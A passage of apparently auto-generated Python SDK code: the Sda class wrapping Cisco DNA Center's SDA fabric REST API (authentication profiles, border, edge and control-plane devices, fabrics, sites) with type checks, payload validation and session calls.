dict_from_items_with_values,
apply_path_params,
dict_of_str,
)
class Sda(object):
"""Cisco DNA Center SDA API (version: 2.2.2.3).
Wraps the DNA Center SDA
API and exposes the API as native Python
methods that return native Python objects.
"""
def __init__(self, session, object_factory, request_validator):
"""Initialize a new Sda
object with the provided RestSession.
Args:
session(RestSession): The RESTful session object to be used for
API calls to the DNA Center service.
Raises:
TypeError: If the parameter types are incorrect.
"""
check_type(session, RestSession)
super(Sda, self).__init__()
self._session = session
self._object_factory = object_factory
self._request_validator = request_validator
def get_default_authentication_profile(self,
site_name_hierarchy,
headers=None,
**request_parameters):
"""Get default authentication profile from SDA Fabric .
Args:
site_name_hierarchy(basestring): siteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/authentication-profile')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_e414dcbeeabd5a359352a0e2ad5ec3f5_v2_2_2_3', json_data)
def add_default_authentication_profile(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add default authentication profile in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_d1d42ef2f1895a82a2830bf1353e6baa_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/authentication-profile')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_d1d42ef2f1895a82a2830bf1353e6baa_v2_2_2_3', json_data)
def update_default_authentication_profile(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Update default authentication profile in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_d999a1d36ee52babb6b619877dad734_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/authentication-profile')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.put(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.put(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_d999a1d36ee52babb6b619877dad734_v2_2_2_3', json_data)
def delete_default_authentication_profile(self,
site_name_hierarchy,
headers=None,
**request_parameters):
"""Add default authentication profile in SDA Fabric .
Args:
site_name_hierarchy(basestring): siteNameHierarchy query parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/authentication-profile')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_b2be8b5dda8b81620b903afe9f_v2_2_2_3', json_data)
def adds_border_device(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Adds border device in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_b6f2d8e46cdd5f05bb06f52cd1b26fb2_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/border-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_b6f2d8e46cdd5f05bb06f52cd1b26fb2_v2_2_2_3', json_data)
def gets_border_device_detail(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Gets border device detail from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/border-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_aae881ff75d5488a5325ea949be4c5b_v2_2_2_3', json_data)
def deletes_border_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Deletes border device from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/border-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_a102ba155e35f84b7af3396aa407d02_v2_2_2_3', json_data)
def delete_control_plane_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Delete control plane device in SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/control-plane-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_c05702ed7075a2f9ab14c051f1ac883_v2_2_2_3', json_data)
def get_control_plane_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Get control plane device from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/control-plane-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_c1a89e4a8ff15608bc6c10d7ef7389d7_v2_2_2_3', json_data)
def add_control_plane_device(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add control plane device in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_ae7f02a3d051f2baf7cc087990d658_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/control-plane-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_ae7f02a3d051f2baf7cc087990d658_v2_2_2_3', json_data)
def get_device_info(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Get device info from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_d12790f461c553a08142ec740db5efbf_v2_2_2_3', json_data)
def get_device_role_in_sda_fabric(self,
device_management_ip_address,
headers=None,
**request_parameters):
"""Get device role in SDA Fabric .
Args:
device_management_ip_address(basestring): deviceManagementIpAddress query parameter. Device Management
IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_management_ip_address, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceManagementIpAddress':
device_management_ip_address,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/device/role')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_ea24b22ce355a229b7fd067401ddf3a_v2_2_2_3', json_data)
def add_edge_device(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add edge device in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_e0c7b28d55c85d49a84c1403ca14bd5f_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/edge-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_e0c7b28d55c85d49a84c1403ca14bd5f_v2_2_2_3', json_data)
def delete_edge_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Delete edge device from SDA Fabric. .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/edge-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_b70d8c6f85254a053ab281fd9e8fc_v2_2_2_3', json_data)
def get_edge_device(self,
device_ipaddress,
headers=None,
**request_parameters):
"""Get edge device from SDA Fabric .
Args:
device_ipaddress(basestring): deviceIPAddress query parameter. Device IP Address .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(device_ipaddress, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'deviceIPAddress':
device_ipaddress,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/edge-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a2ee396d6595001acfbbcdfa25093ff_v2_2_2_3', json_data)
def delete_sda_fabric(self,
fabric_name,
headers=None,
**request_parameters):
"""Delete SDA Fabric .
Args:
fabric_name(basestring): fabricName query parameter. Fabric Name .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(fabric_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'fabricName':
fabric_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_e14e65da844f55448c1378ca851c7d43_v2_2_2_3', json_data)
def get_sda_fabric_info(self,
fabric_name,
headers=None,
**request_parameters):
"""Get SDA Fabric Info .
Args:
fabric_name(basestring): fabricName query parameter. Fabric Name .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(fabric_name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'fabricName':
fabric_name,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_b7335c6b5057b183a339aa30e7c233_v2_2_2_3', json_data)
def add_fabric(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_c31231005eaf51faa0bf1b651bdcb7a0_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_c31231005eaf51faa0bf1b651bdcb7a0_v2_2_2_3', json_data)
def get_site(self,
site_name_hierarchy,
headers=None,
**request_parameters):
"""Get Site info from SDA Fabric .
Args:
site_name_hierarchy(basestring): siteNameHierarchy query parameter. Site Name Hierarchy .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric-site')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_d23f3e54f8c59caac3ca905f7bf543a_v2_2_2_3', json_data)
def delete_site(self,
site_name_hierarchy,
headers=None,
**request_parameters):
"""Delete Site from SDA Fabric .
Args:
site_name_hierarchy(basestring): siteNameHierarchy query parameter. Site Name Hierarchy .
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(site_name_hierarchy, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
'siteNameHierarchy':
site_name_hierarchy,
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric-site')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_f9db3b115f0b8c8b3ce14bc5f975_v2_2_2_3', json_data)
def add_site(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add Site in SDA Fabric .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
_payload = payload or []
if active_validation:
self._request_validator('jsd_a764c85d8df5c30b9143619d4f9cde9_v2_2_2_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric-site')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=_params,
json=_payload)
return self._object_factory('bpm_a764c85d8df5c30b9143619d4f9cde9_v2_2_2_3', json_data)
def get_sda_fabric_count(self,
headers=None,
**request_parameters):
"""Get SDA Fabric Count .
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
_params = {
}
_params.update(request_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/business/sda/fabric/count')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a74fcc0d07935a06a74662dc648ac0b7_v2_2_2_3', json_data)
def add_port_assignment_for_access_point(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add Port assignment for access point in SDA Fabric .
Args:
